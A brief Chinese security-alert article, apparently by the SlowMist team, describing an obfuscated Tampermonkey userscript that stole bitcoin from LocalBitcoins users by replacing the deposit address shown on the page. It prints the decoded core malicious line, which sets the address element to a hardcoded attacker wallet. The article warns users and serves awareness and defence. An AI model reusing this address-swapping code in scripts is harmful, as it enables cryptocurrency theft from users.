作者:余弦
据慢雾区情报反馈,有人在LocalBitcoins(localbitcoins.com) 进行交易时,被诱骗使用了一段所谓增强的JavaScript 插件导致被盗比特币,该JavaScript 插件可以在浏览器知名扩展Tampermonkey(油猴) 上方便使用。一旦使用,该恶意JavaScript 即可篡改用户在LocalBitcoins 上的比特币地址,达到劫持盗币攻击的目的。
这段恶意JavaScript 代码进行了多层加密与加花处理,肉眼看不出恶意行为,通过xssor.io 进行解密后可以清晰看到“劫持盗币”的核心代码:
document[_0x66e1x6("0x0")]("bitcoin-address bitcoin-address-controls")[0]["innerHTML"] = "1Ak8db781gfM3QutGwFsKuZg7YeUEoCvPw"
过程如图。
在此继续提醒:Web 前端可以是邪恶的,JavaScript 可以是邪恶的,当我们在浏览器里自由翱翔时,比如交易所Web 操作、DeFi Web操作,肉眼无法识别各种来自恶意JavaScript 的攻击。而对抗这类攻击门槛又非常的高,只能说:不断提供认知,不仅是用户,还有项目方。解决方案有,但一言难尽,也许通过我之前的这篇文章可以多掌握些认知:
声明:本内容为作者独立观点,不代表 CoinVoice 立场,且不构成投资建议,请谨慎对待,如需报道或加入交流群,请联系微信:VOICE-V。
简介:“慢雾”,专注区块链生态安全
评论0条